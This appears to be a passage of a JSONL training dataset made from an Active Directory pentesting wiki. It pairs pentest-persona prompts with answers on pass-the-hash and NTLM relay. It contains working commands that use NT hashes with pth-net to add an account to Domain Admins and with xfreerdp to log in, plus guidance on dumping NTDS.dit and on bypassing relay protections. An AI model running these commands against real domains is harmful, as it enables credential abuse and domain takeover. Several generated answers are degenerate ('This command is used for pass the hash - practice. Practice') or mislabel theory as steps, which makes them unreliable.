"Pass the hash", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "pth-net"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Pass the hash - Practice"}, {"role": "assistant", "content": "pth-net rpc group members \"Domain admins\" -U 'Domain/User%LMhash:NThash' -S $DOMAIN_CONTROLLER\npth-net rpc group addmem \"Domain admins\" Shutdown -U 'Domain/Admin%LMhash:NThash' -S $DOMAIN_CONTROLLER"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Pass the hash - Practice", "response": "pth-net rpc group members \"Domain admins\" -U 'Domain/User%LMhash:NThash' -S $DOMAIN_CONTROLLER\npth-net rpc group addmem \"Domain admins\" Shutdown -U 'Domain/Admin%LMhash:NThash' -S $DOMAIN_CONTROLLER", "metadata": {"corpus_index": 951, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `pth-net rpc group members \"Domain admins\" -U 'Domain/User%LMhash:NThash' -S $DOMAIN_CONTROLLER`?"}, {"role": "assistant", "content": "This command is used for pass the hash - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `pth-net rpc group members \"Domain admins\" -U 'Domain/User%LMhash:NThash' -S $DOMAIN_CONTROLLER`?", "response": "This command is used for pass the hash - practice. Practice", "metadata": {"corpus_index": 951, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the xfreerdp command for pass the hash - practice"}, {"role": "assistant", "content": "xfreerdp /u:$USER /d:$DOMAIN /pth:'LMhash:NThash' /v:$TARGET /h:1010 /w:1920"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the xfreerdp command for pass the hash - practice", "response": "xfreerdp /u:$USER /d:$DOMAIN /pth:'LMhash:NThash' /v:$TARGET /h:1010 /w:1920", "metadata": {"corpus_index": 952, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "xfreerdp"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Pass the hash - Practice"}, {"role": "assistant", "content": "xfreerdp /u:$USER /d:$DOMAIN /pth:'LMhash:NThash' /v:$TARGET /h:1010 /w:1920"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Pass the hash - Practice", "response": "xfreerdp /u:$USER /d:$DOMAIN /pth:'LMhash:NThash' /v:$TARGET /h:1010 /w:1920", "metadata": {"corpus_index": 952, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `xfreerdp /u:$USER /d:$DOMAIN /pth:'LMhash:NThash' /v:$TARGET /h:1010 /w:1920`?"}, {"role": "assistant", "content": "This command is used for pass the hash - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `xfreerdp /u:$USER /d:$DOMAIN /pth:'LMhash:NThash' /v:$TARGET /h:1010 /w:1920`?", "response": "This command is used for pass the hash - practice. Practice", "metadata": {"corpus_index": 952, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Pass the hash - Limitations, tips and tricks"}, {"role": "assistant", "content": "> [!IMPORTANT] UAC limits pass-the-hash\n> UAC (User Account Control) limits which local users can do remote administration operations. And since most of the attacks exploiting pass-the-hash rely on remote admin operations, it affects this technique.\n> \n> * the registry key LocalAccountTokenFilterPolicy is set to 0 by default. It means that the built-in local admin account (RID-500, \"Administrator\") is the only local account allowed to do remote administration tasks. Setting it to 1 allows the other local admins as well.\n> * the registry key FilterAdministratorToken is set to 0 by default. It allows the built-in local admin account (RID-500, \"Administrator\") to do remote administration tasks. If set to 1, it doesn't.\n> \n> In short, by default, only the following accounts can fully take advantage of pass-the-hash:\n> \n> * local accounts : the built-in, RID-500, \"Administrator\" account\n> * domain accounts : all domain accounts with local admin rights\n\n> [!NOTE] WinRM enables pass-the-hash\n> Testers should look out for environments with WinRM enabled. During the WinRM configuration, the Enable-PSRemoting sets the LocalAccountTokenFilterPolicy to 1, allowing all local accounts with admin privileges to do remote admin tasks, hence allowing those accounts to fully take advantage of pass-the-hash.\n\n> [!TIP] Machine accounts\n> Just like with any other domain account, a machine account's NT hash can be used with pass-the-hash, but it is not possible to operate remote operations that require local admin rights (such as SAM & LSA secrets dump). These operations can instead be conducted after crafting a Silver Ticket or doing S4U2self abuse, since the machine accounts validates Kerberos tickets used to authenticate to a said computer/service.\n> \n> A domain controller machine account's NT hash can be used with pass-the-hash to dump the domain hashes (NTDS.dit)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Pass the hash - Limitations, tips and tricks", "response": "> [!IMPORTANT] UAC limits pass-the-hash\n> UAC (User Account Control) limits which local users can do remote administration operations. And since most of the attacks exploiting pass-the-hash rely on remote admin operations, it affects this technique.\n> \n> * the registry key LocalAccountTokenFilterPolicy is set to 0 by default. It means that the built-in local admin account (RID-500, \"Administrator\") is the only local account allowed to do remote administration tasks. Setting it to 1 allows the other local admins as well.\n> * the registry key FilterAdministratorToken is set to 0 by default. It allows the built-in local admin account (RID-500, \"Administrator\") to do remote administration tasks. If set to 1, it doesn't.\n> \n> In short, by default, only the following accounts can fully take advantage of pass-the-hash:\n> \n> * local accounts : the built-in, RID-500, \"Administrator\" account\n> * domain accounts : all domain accounts with local admin rights\n\n> [!NOTE] WinRM enables pass-the-hash\n> Testers should look out for environments with WinRM enabled. During the WinRM configuration, the Enable-PSRemoting sets the LocalAccountTokenFilterPolicy to 1, allowing all local accounts with admin privileges to do remote admin tasks, hence allowing those accounts to fully take advantage of pass-the-hash.\n\n> [!TIP] Machine accounts\n> Just like with any other domain account, a machine account's NT hash can be used with pass-the-hash, but it is not possible to operate remote operations that require local admin rights (such as SAM & LSA secrets dump). These operations can instead be conducted after crafting a Silver Ticket or doing S4U2self abuse, since the machine accounts validates Kerberos tickets used to authenticate to a said computer/service.\n> \n> A domain controller machine account's NT hash can be used with pass-the-hash to dump the domain hashes (NTDS.dit).", "metadata": {"corpus_index": 953, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Pass the hash - Limitations, tips and tricks?"}, {"role": "assistant", "content": "> [!IMPORTANT] UAC limits pass-the-hash\n> UAC (User Account Control) limits which local users can do remote administration operations. And since most of the attacks exploiting pass-the-hash rely on remote admin operations, it affects this technique.\n> \n> * the registry key LocalAccountTokenFilterPolicy is set to 0 by default. It means that the built-in local admin account (RID-500, \"Administrator\") is the only local account allowed to do remote administration tasks. Setting it to 1 allows the other local admins as well.\n> * the registry key FilterAdministratorToken is set to 0 by default. It allows the built-in local admin account (RID-500, \"Administrator\") to do remote administration tasks. If set to 1, it doesn't.\n> \n> In short, by default, only the following accounts can fully take advantage of pass-the-hash:\n> \n> * local accounts : the built-in, RID-500, \"Administrator\" account\n> * domain accounts : all domain accounts with local admin rights\n\n> [!NOTE] WinRM enables pass-the-hash\n> Testers should look out for environments with WinRM enabled. During the WinRM configuration, the Enable-PSRemoting sets the LocalAccountTokenFilterPolicy to 1, allowing all local accounts with admin privileges to do remote admin tasks, hence allowing those accounts to fully take advantage of pass-the-hash.\n\n> [!TIP] Machine accounts\n> Just like with any other domain account, a machine account's NT hash can be used with pass-the-hash, but it is not possible to operate remote operations that require local admin rights (such as SAM & LSA secrets dump). These operations can instead be conducted after crafting a Silver Ticket or doing S4U2self abuse, since the machine accounts validates Kerberos tickets used to authenticate to a said computer/service.\n> \n> A domain controller machine account's NT hash can be used with pass-the-hash to dump the domain hashes (NTDS.dit)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Pass the hash - Limitations, tips and tricks?", "response": "> [!IMPORTANT] UAC limits pass-the-hash\n> UAC (User Account Control) limits which local users can do remote administration operations. And since most of the attacks exploiting pass-the-hash rely on remote admin operations, it affects this technique.\n> \n> * the registry key LocalAccountTokenFilterPolicy is set to 0 by default. It means that the built-in local admin account (RID-500, \"Administrator\") is the only local account allowed to do remote administration tasks. Setting it to 1 allows the other local admins as well.\n> * the registry key FilterAdministratorToken is set to 0 by default. It allows the built-in local admin account (RID-500, \"Administrator\") to do remote administration tasks. If set to 1, it doesn't.\n> \n> In short, by default, only the following accounts can fully take advantage of pass-the-hash:\n> \n> * local accounts : the built-in, RID-500, \"Administrator\" account\n> * domain accounts : all domain accounts with local admin rights\n\n> [!NOTE] WinRM enables pass-the-hash\n> Testers should look out for environments with WinRM enabled. During the WinRM configuration, the Enable-PSRemoting sets the LocalAccountTokenFilterPolicy to 1, allowing all local accounts with admin privileges to do remote admin tasks, hence allowing those accounts to fully take advantage of pass-the-hash.\n\n> [!TIP] Machine accounts\n> Just like with any other domain account, a machine account's NT hash can be used with pass-the-hash, but it is not possible to operate remote operations that require local admin rights (such as SAM & LSA secrets dump). These operations can instead be conducted after crafting a Silver Ticket or doing S4U2self abuse, since the machine accounts validates Kerberos tickets used to authenticate to a said computer/service.\n> \n> A domain controller machine account's NT hash can be used with pass-the-hash to dump the domain hashes (NTDS.dit).", "metadata": {"corpus_index": 953, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe NTLM relay - Theory in the context of penetration testing"}, {"role": "assistant", "content": "After successfully forcing a victim to authenticate with LM or NTLM to an attacker's server, the attacker can try to relay that authentication to targets of his choosing. Depending on the mitigations in place, he will be able to move laterally and escalate privileges within an Active Directory domain.\n\nThe NTLM authentication messages are embedded in the packets of application protocols such as SMB, HTTP, MSSQL, SMTP, IMAP. The LM and NTLM authentication protocols are \"application protocol-independent\". It means one can relay LM or NTLM authentication messages over a certain protocol, say HTTP, over another, say SMB. That is called cross-protocols LM/NTLM relay. It also means the relays and attacks possible depend on the application protocol the authentication messages are embedded in.\n\nThe chart below sums up the expected behavior of cross-protocols relay attacks depending on the mitigations in place (original here). All the tests and results listed in the chart were made using Impacket's ntlmrelayx (Python).\n\n![]()\n\nThe following mindmap sums up the overall attack paths of NTLM relay. Gabriel Prudhomme explains how to read it here: BHIS | Coercions and Relays – The First Cred is the Deepest (at 08:00).\n\n![](<./assets/NTLM relay.png>)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe NTLM relay - Theory in the context of penetration testing", "response": "After successfully forcing a victim to authenticate with LM or NTLM to an attacker's server, the attacker can try to relay that authentication to targets of his choosing. Depending on the mitigations in place, he will be able to move laterally and escalate privileges within an Active Directory domain.\n\nThe NTLM authentication messages are embedded in the packets of application protocols such as SMB, HTTP, MSSQL, SMTP, IMAP. The LM and NTLM authentication protocols are \"application protocol-independent\". It means one can relay LM or NTLM authentication messages over a certain protocol, say HTTP, over another, say SMB. That is called cross-protocols LM/NTLM relay. It also means the relays and attacks possible depend on the application protocol the authentication messages are embedded in.\n\nThe chart below sums up the expected behavior of cross-protocols relay attacks depending on the mitigations in place (original here). All the tests and results listed in the chart were made using Impacket's ntlmrelayx (Python).\n\n![]()\n\nThe following mindmap sums up the overall attack paths of NTLM relay. Gabriel Prudhomme explains how to read it here: BHIS | Coercions and Relays – The First Cred is the Deepest (at 08:00).\n\n![](<./assets/NTLM relay.png>)", "metadata": {"corpus_index": 954, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out NTLM relay - Theory during a pentest?"}, {"role": "assistant", "content": "After successfully forcing a victim to authenticate with LM or NTLM to an attacker's server, the attacker can try to relay that authentication to targets of his choosing. Depending on the mitigations in place, he will be able to move laterally and escalate privileges within an Active Directory domain.\n\nThe NTLM authentication messages are embedded in the packets of application protocols such as SMB, HTTP, MSSQL, SMTP, IMAP. The LM and NTLM authentication protocols are \"application protocol-independent\". It means one can relay LM or NTLM authentication messages over a certain protocol, say HTTP, over another, say SMB. That is called cross-protocols LM/NTLM relay. It also means the relays and attacks possible depend on the application protocol the authentication messages are embedded in.\n\nThe chart below sums up the expected behavior of cross-protocols relay attacks depending on the mitigations in place (original here). All the tests and results listed in the chart were made using Impacket's ntlmrelayx (Python).\n\n![]()\n\nThe following mindmap sums up the overall attack paths of NTLM relay. Gabriel Prudhomme explains how to read it here: BHIS | Coercions and Relays – The First Cred is the Deepest (at 08:00).\n\n![](<./assets/NTLM relay.png>)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out NTLM relay - Theory during a pentest?", "response": "After successfully forcing a victim to authenticate with LM or NTLM to an attacker's server, the attacker can try to relay that authentication to targets of his choosing. Depending on the mitigations in place, he will be able to move laterally and escalate privileges within an Active Directory domain.\n\nThe NTLM authentication messages are embedded in the packets of application protocols such as SMB, HTTP, MSSQL, SMTP, IMAP. The LM and NTLM authentication protocols are \"application protocol-independent\". It means one can relay LM or NTLM authentication messages over a certain protocol, say HTTP, over another, say SMB. That is called cross-protocols LM/NTLM relay. It also means the relays and attacks possible depend on the application protocol the authentication messages are embedded in.\n\nThe chart below sums up the expected behavior of cross-protocols relay attacks depending on the mitigations in place (original here). All the tests and results listed in the chart were made using Impacket's ntlmrelayx (Python).\n\n![]()\n\nThe following mindmap sums up the overall attack paths of NTLM relay. Gabriel Prudhomme explains how to read it here: BHIS | Coercions and Relays – The First Cred is the Deepest (at 08:00).\n\n![](<./assets/NTLM relay.png>)", "metadata": {"corpus_index": 954, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is NTLM relay - Session signing?"}, {"role": "assistant", "content": "Session signing is a powerful but limited mitigation against NTLM relay that only SMB and LDAP can use.\n\n* SMB signing works in a \"least requirements\" way. If neither the client or the server require signing, the session will not be signed (because of performance issues)\n* LDAP signing works in a \"most requirements\" way. If both the client and the server support signing, then they will sign the session\n\nFor this mitigation to protect against NTLM relay, it has to be enabled on the target server side. Session signing protects the session's integrity, not the authentication's integrity. If session signing fails on the relayed victim side, the session victim <-> attacker will be killed AFTER the authentication, hence allowing an attacker to relay that authentication and get a valid session attacker <-> target (if the target is not requiring signing).\n\nSince the session signing is negotiated during the NTLM authentication, why couldn't attackers tamper with the messages and unset the signing negotiation flags? Because there is a protection called MIC that prevents this.\n\n> [!TIP]\n> There is a strange behavior when doing cross-protocols relay (like relaying an SMB auth to an LDAP auth). When attackers try to relay NTLM blobs including signing negotiation flags to a protocol not supporting session signing (like LDAPS), the target server usually glitches and kills the authentication negotiation.\n> \n> Attackers that want to avoid glitches like this need to operate an cross-protocols unsigning relay where they relay the NTLM blobs and remove the signing negotiation flags."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is NTLM relay - Session signing?", "response": "Session signing is a powerful but limited mitigation against NTLM relay that only SMB and LDAP can use.\n\n* SMB signing works in a \"least requirements\" way. If neither the client or the server require signing, the session will not be signed (because of performance issues)\n* LDAP signing works in a \"most requirements\" way. If both the client and the server support signing, then they will sign the session\n\nFor this mitigation to protect against NTLM relay, it has to be enabled on the target server side. Session signing protects the session's integrity, not the authentication's integrity. If session signing fails on the relayed victim side, the session victim <-> attacker will be killed AFTER the authentication, hence allowing an attacker to relay that authentication and get a valid session attacker <-> target (if the target is not requiring signing).\n\nSince the session signing is negotiated during the NTLM authentication, why couldn't attackers tamper with the messages and unset the signing negotiation flags? Because there is a protection called MIC that prevents this.\n\n> [!TIP]\n> There is a strange behavior when doing cross-protocols relay (like relaying an SMB auth to an LDAP auth). When attackers try to relay NTLM blobs including signing negotiation flags to a protocol not supporting session signing (like LDAPS), the target server usually glitches and kills the authentication negotiation.\n> \n> Attackers that want to avoid glitches like this need to operate an cross-protocols unsigning relay where they relay the NTLM blobs and remove the signing negotiation flags.", "metadata": {"corpus_index": 955, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for NTLM relay - Session signing"}, {"role": "assistant", "content": "Session signing is a powerful but limited mitigation against NTLM relay that only SMB and LDAP can use.\n\n* SMB signing works in a \"least requirements\" way. If neither the client or the server require signing, the session will not be signed (because of performance issues)\n* LDAP signing works in a \"most requirements\" way. If both the client and the server support signing, then they will sign the session\n\nFor this mitigation to protect against NTLM relay, it has to be enabled on the target server side. Session signing protects the session's integrity, not the authentication's integrity. If session signing fails on the relayed victim side, the session victim <-> attacker will be killed AFTER the authentication, hence allowing an attacker to relay that authentication and get a valid session attacker <-> target (if the target is not requiring signing).\n\nSince the session signing is negotiated during the NTLM authentication, why couldn't attackers tamper with the messages and unset the signing negotiation flags? Because there is a protection called MIC that prevents this.\n\n> [!TIP]\n> There is a strange behavior when doing cross-protocols relay (like relaying an SMB auth to an LDAP auth). When attackers try to relay NTLM blobs including signing negotiation flags to a protocol not supporting session signing (like LDAPS), the target server usually glitches and kills the authentication negotiation.\n> \n> Attackers that want to avoid glitches like this need to operate an cross-protocols unsigning relay where they relay the NTLM blobs and remove the signing negotiation flags."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for NTLM relay - Session signing", "response": "Session signing is a powerful but limited mitigation against NTLM relay that only SMB and LDAP can use.\n\n* SMB signing works in a \"least requirements\" way. If neither the client or the server require signing, the session will not be signed (because of performance issues)\n* LDAP signing works in a \"most requirements\" way. If both the client and the server support signing, then they will sign the session\n\nFor this mitigation to protect against NTLM relay, it has to be enabled on the target server side. Session signing protects the session's integrity, not the authentication's integrity. If session signing fails on the relayed victim side, the session victim <-> attacker will be killed AFTER the authentication, hence allowing an attacker to relay that authentication and get a valid session attacker <-> target (if the target is not requiring signing).\n\nSince the session signing is negotiated during the NTLM authentication, why couldn't attackers tamper with the messages and unset the signing negotiation flags? Because there is a protection called MIC that prevents this.\n\n> [!TIP]\n> There is a strange behavior when doing cross-protocols relay (like relaying an SMB auth to an LDAP auth). When attackers try to relay NTLM blobs including signing negotiation flags to a protocol not supporting session signing (like LDAPS), the target server usually glitches and kills the authentication negotiation.\n> \n> Attackers that want to avoid glitches like this need to operate an cross-protocols unsigning relay where they relay the NTLM blobs and remove the signing negotiation flags.", "metadata": {"corpus_index": 955, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe NTLM relay - MIC (Message Integrity Code) in the context of penetration testing"}, {"role": "assistant", "content": "MIC (Message Integrity Code) is an optional mitigation that garantess the NTLM messages integrity. MIC prevents attackers from tampering with NTLM messages when relaying them (i.e. cross-protocols unsigning relays). With this mitigation, attackers can't remove the session signing negotiation flags. Unlike session signing, MIC protects the authentication.\n\nOn a side note, NTLMv2 responses are computed against multiples values including\n\n* the user's NT hash\n* the server Challenge\n* the AvPairs, a byte array containing the msAvFlags flag, which is used to enable the MIC\n\nOn the other hand, NTLMv1 responses do not include the AvPairs in their calculation, leaving the MIC unsupported for this version of NTLM.\n\nIn conclusion, session signing is protected by the MIC, which is enabled with the msAvFlags, which is protected by the NTLMv2 response, which can not be modified when not knowing the user's NT hash.\n\n(Un)fortunately, there are vulnerabilities that exist that allow attackers to operate cross-protocols unsigning relays on unpatched targets.\n\n* Drop the MIC (CVE-2019-1040)\n* Drop the MIC 2 (CVE-2019-1166)\n* Stealing the session key (CVE-2019-1019)\n\n> [!NOTE]\n> As of november 2020, MIC was optional, but unofficial channels suggest it might've become mandatory.\n\n> [!NOTE]\n> Windows Server 2019 ISOs seem to be patched against (at least) CVE-2019-1040.\n\n> [!SUCCESS] Reminder: NTLMv1 doesn't like MIC\n> If NTLMv1 is accepted, NTLM could be relayed and modified and the MIC dropped :microphone:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe NTLM relay - MIC (Message Integrity Code) in the context of penetration testing", "response": "MIC (Message Integrity Code) is an optional mitigation that garantess the NTLM messages integrity. MIC prevents attackers from tampering with NTLM messages when relaying them (i.e. cross-protocols unsigning relays). With this mitigation, attackers can't remove the session signing negotiation flags. Unlike session signing, MIC protects the authentication.\n\nOn a side note, NTLMv2 responses are computed against multiples values including\n\n* the user's NT hash\n* the server Challenge\n* the AvPairs, a byte array containing the msAvFlags flag, which is used to enable the MIC\n\nOn the other hand, NTLMv1 responses do not include the AvPairs in their calculation, leaving the MIC unsupported for this version of NTLM.\n\nIn conclusion, session signing is protected by the MIC, which is enabled with the msAvFlags, which is protected by the NTLMv2 response, which can not be modified when not knowing the user's NT hash.\n\n(Un)fortunately, there are vulnerabilities that exist that allow attackers to operate cross-protocols unsigning relays on unpatched targets.\n\n* Drop the MIC (CVE-2019-1040)\n* Drop the MIC 2 (CVE-2019-1166)\n* Stealing the session key (CVE-2019-1019)\n\n> [!NOTE]\n> As of november 2020, MIC was optional, but unofficial channels suggest it might've become mandatory.\n\n> [!NOTE]\n> Windows Server 2019 ISOs seem to be patched against (at least) CVE-2019-1040.\n\n> [!SUCCESS] Reminder: NTLMv1 doesn't like MIC\n> If NTLMv1 is accepted, NTLM could be relayed and modified and the MIC dropped :microphone:", "metadata": {"corpus_index": 956, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for NTLM relay - MIC (Message Integrity Code)"}, {"role": "assistant", "content": "MIC (Message Integrity Code) is an optional mitigation that garantess the NTLM messages integrity. MIC prevents attackers from tampering with NTLM messages when relaying them (i.e. cross-protocols unsigning relays). With this mitigation, attackers can't remove the session signing negotiation flags. Unlike session signing, MIC protects the authentication.\n\nOn a side note, NTLMv2 responses are computed against multiples values including\n\n* the user's NT hash\n* the server Challenge\n* the AvPairs, a byte array containing the msAvFlags flag, which is used to enable the MIC\n\nOn the other hand, NTLMv1 responses do not include the AvPairs in their calculation, leaving the MIC unsupported for this version of NTLM.\n\nIn conclusion, session signing is protected by the MIC, which is enabled with the msAvFlags, which is protected by the NTLMv2 response, which can not be modified when not knowing the user's NT hash.\n\n(Un)fortunately, there are vulnerabilities that exist that allow attackers to operate cross-protocols unsigning relays on unpatched targets.\n\n* Drop the MIC (CVE-2019-1040)\n* Drop the MIC 2 (CVE-2019-1166)\n* Stealing the session key (CVE-2019-1019)\n\n> [!NOTE]\n> As of november 2020, MIC was optional, but unofficial channels suggest it might've become mandatory.\n\n> [!NOTE]\n> Windows Server 2019 ISOs seem to be patched against (at least) CVE-2019-1040.\n\n> [!SUCCESS] Reminder: NTLMv1 doesn't like MIC\n> If NTLMv1 is accepted, NTLM could be relayed and modified and the MIC dropped :microphone:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for NTLM relay - MIC (Message Integrity Code)", "response": "MIC (Message Integrity Code) is an optional mitigation that garantess the NTLM messages integrity. MIC prevents attackers from tampering with NTLM messages when relaying them (i.e. cross-protocols unsigning relays). With this mitigation, attackers can't remove the session signing negotiation flags. Unlike session signing, MIC protects the authentication.\n\nOn a side note, NTLMv2 responses are computed against multiples values including\n\n* the user's NT hash\n* the server Challenge\n* the AvPairs, a byte array containing the msAvFlags flag, which is used to enable the MIC\n\nOn the other hand, NTLMv1 responses do not include the AvPairs in their calculation, leaving the MIC unsupported for this version of NTLM.\n\nIn conclusion, session signing is protected by the MIC, which is enabled with the msAvFlags, which is protected by the NTLMv2 response, which can not be modified when not knowing the user's NT hash.\n\n(Un)fortunately, there are vulnerabilities that exist that allow attackers to operate cross-protocols unsigning relays on unpatched targets.\n\n* Drop the MIC (CVE-2019-1040)\n* Drop the MIC 2 (CVE-2019-1166)\n* Stealing the session key (CVE-2019-1019)\n\n> [!NOTE]\n> As of november 2020, MIC was optional, but unofficial channels suggest it might've become mandatory.\n\n> [!NOTE]\n> Windows Server 2019 ISOs seem to be patched against (at least) CVE-2019-1040.\n\n> [!SUCCESS] Reminder: NTLMv1 doesn't like MIC\n> If NTLMv1 is accepted, NTLM could be relayed and modified and the MIC dropped :microphone:", "metadata": {"corpus_index": 956, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe NTLM relay - EPA (Extended Protection for Auth.) in the context of penetration testing"}, {"role": "assistant", "content": "In short, EPA (Extended Protection for Authentication) can use one or both of the following two mitigations to provide mitigation against NTLM relay for protocols that don't support session signing such HTTPS and LDAPS:\n\n* A Channel Binding Token (CBT) when there is a TLS channel to bind to (HTTPS, LDAPS)\n* A Service Binding information in the form of a Service Principal Name (SPN), usually when there is no TLS channel to bind to (HTTP)\n\n> [!TIP]\n> For more details on how NTLM works, testers can read the MS-NLMP doc."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe NTLM relay - EPA (Extended Protection for Auth.) in the context of penetration testing", "response": "In short, EPA (Extended Protection for Authentication) can use one or both of the following two mitigations to provide mitigation against NTLM relay for protocols that don't support session signing such HTTPS and LDAPS:\n\n* A Channel Binding Token (CBT) when there is a TLS channel to bind to (HTTPS, LDAPS)\n* A Service Binding information in the form of a Service Principal Name (SPN), usually when there is no TLS channel to bind to (HTTP)\n\n> [!TIP]\n> For more details on how NTLM works, testers can read the MS-NLMP doc.", 